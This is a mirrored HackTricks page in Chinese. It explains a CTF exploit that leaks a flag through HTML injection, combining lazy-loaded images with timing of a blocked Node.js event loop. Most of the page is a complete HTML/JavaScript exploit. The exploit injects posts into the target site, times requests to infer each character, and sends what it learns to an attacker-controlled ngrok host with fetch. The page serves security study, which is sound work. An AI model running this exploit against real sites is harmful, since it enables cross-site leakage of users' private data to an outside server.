mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
163 lines
7.7 KiB
Markdown
163 lines
7.7 KiB
Markdown
# 阻塞事件循环 + 懒加载图片
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一家**网络安全公司**工作吗?你想在 HackTricks 中看到你的**公司广告**吗?或者你想获得**PEASS 的最新版本或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||
* **通过向[hacktricks 仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud)提交 PR 来分享你的黑客技巧**。
|
||
|
||
</details>
|
||
|
||
在[**这个漏洞利用**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45)中,[**@aszx87410**](https://twitter.com/aszx87410)通过HTML注入混合使用了**懒加载图片侧信道**技术和一种**阻塞事件循环技术**来泄露字符。
|
||
|
||
这是一个针对已在以下页面中进行了评论的 CTF 挑战的**不同漏洞利用**。请查看有关挑战的更多信息:
|
||
|
||
{% content-ref url="connection-pool-example.md" %}
|
||
[connection-pool-example.md](connection-pool-example.md)
|
||
{% endcontent-ref %}
|
||
|
||
这个漏洞利用的思路是:
|
||
|
||
* 帖子按字母顺序加载
|
||
* **攻击者**可以**注入**一个以**"A"**开头的**帖子**,然后一些**HTML 标签**(如一个大的**`<canvas`**)将占据大部分**屏幕**,并且一些最终的**`<img lazy` 标签**用于加载内容。
|
||
* 如果攻击者注入的是以**"z"**开头的**相同帖子**而不是"A",那么**带有标志的帖子**将首先出现,然后**注入的帖子**将以初始的"z"和**大的 canvas**出现。因为带有标志的帖子首先出现,第一个 canvas 将占据整个屏幕,注入的最终**`<img lazy`**标签在屏幕上**看不见**,因此它们**不会被加载**。
|
||
* 然后,**当**机器人正在**访问**页面时,**攻击者**将**发送获取请求**。 
|
||
* 如果**帖子**中注入的**图片**正在**加载**,这些**获取请求**将花费**更长时间**,因此攻击者知道**帖子在标志之前**(按字母顺序)。
|
||
* 如果**获取请求**很**快**,这意味着**帖子**在标志之后按字母顺序排列。
|
||
|
||
让我们来看看代码:
|
||
```html
|
||
<!DOCTYPE html>
|
||
<html>
|
||
<!--
|
||
The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs event loop.
|
||
If images are loading, the request to "/" is slower, otherwise faster.
|
||
By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.
|
||
We can use fetch to measure the request time.
|
||
-->
|
||
<body>
|
||
<button onclick="run()">start</button>
|
||
|
||
<!-- Inject post with payload -->
|
||
<form id=f action="http://localhost:1234/create" method="POST" target="_blank">
|
||
<input id=inp name="text" value="">
|
||
</form>
|
||
|
||
<!-- Remove index -->
|
||
<form id=f2 action="http://localhost:1234/remove" method="POST" target="_blank">
|
||
<input id=inp2 name="index" value="">
|
||
</form>
|
||
|
||
<script>
|
||
let flag = 'SEKAI{'
|
||
const TARGET = 'https://safelist.ctf.sekai.team'
|
||
f.action = TARGET + '/create'
|
||
f2.action = TARGET + '/remove'
|
||
|
||
const sleep = ms => new Promise(r => setTimeout(r, ms))
|
||
// Function to leak info to attacker
|
||
const send = data => fetch('http://server.ngrok.io?d='+data)
|
||
const charset = 'abcdefghijklmnopqrstuvwxyz'.split('')
|
||
|
||
// start exploit
|
||
let count = 0
|
||
setTimeout(async () => {
|
||
let L = 0
|
||
let R = charset.length - 1
|
||
|
||
// I have omited code here as apparently it wasn't necesary
|
||
|
||
// fallback to linerar since I am not familiar with binary search lol
|
||
for(let i=R; i>=L; i--) {
|
||
let c = charset[i]
|
||
send('try_' + flag + c)
|
||
const found = await testChar(flag + c)
|
||
if (found) {
|
||
send('found: '+ flag+c)
|
||
flag += c
|
||
break
|
||
}
|
||
}
|
||
|
||
}, 0)
|
||
|
||
async function testChar(str) {
|
||
return new Promise(resolve => {
|
||
/*
|
||
For 3350, you need to test it on your local to get this number.
|
||
The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading threshold
|
||
If starts with "A", the image should be loaded because it's in the threshold.
|
||
*/
|
||
// <canvas height="3350px"> is experimental and allow to show the injected
|
||
// images when the post injected is the first one but to hide them when
|
||
// the injected post is after the post with the flag
|
||
inp.value = str + '<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')
|
||
f.submit()
|
||
|
||
setTimeout(() => {
|
||
run(str, resolve)
|
||
}, 500)
|
||
})
|
||
}
|
||
|
||
async function run(str, resolve) {
|
||
// Open posts page 5 times
|
||
for(let i=1; i<=5;i++) {
|
||
window.open(TARGET)
|
||
}
|
||
|
||
let t = 0
|
||
const round = 30 //Lets time 30 requests
|
||
setTimeout(async () => {
|
||
// Send 30 requests and time each
|
||
for(let i=0; i<round; i++) {
|
||
let s = performance.now()
|
||
await fetch(TARGET + '/?test', {
|
||
mode: 'no-cors'
|
||
}).catch(err=>1)
|
||
let end = performance.now()
|
||
t += end - s
|
||
console.log(end - s)
|
||
}
|
||
const avg = t/round
|
||
// Send info about how much time it took
|
||
send(str + "," + t + "," + "avg:" + avg)
|
||
|
||
/*
|
||
I get this threshold(1000ms) by trying multiple times on remote admin bot
|
||
for example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold
|
||
*/
|
||
const isFound = (t >= 1000)
|
||
if (isFound) {
|
||
inp2.value = "0"
|
||
} else {
|
||
inp2.value = "1"
|
||
}
|
||
|
||
// remember to delete the post to not break our leak oracle
|
||
f2.submit()
|
||
setTimeout(() => {
|
||
resolve(isFound)
|
||
}, 200)
|
||
}, 200)
|
||
}
|
||
|
||
</script>
|
||
</body>
|
||
</html>
|
||
```
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或者 [**telegram群组**](https://t.me/peass) 或者 **关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
* **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。
|
||
|
||
</details>
|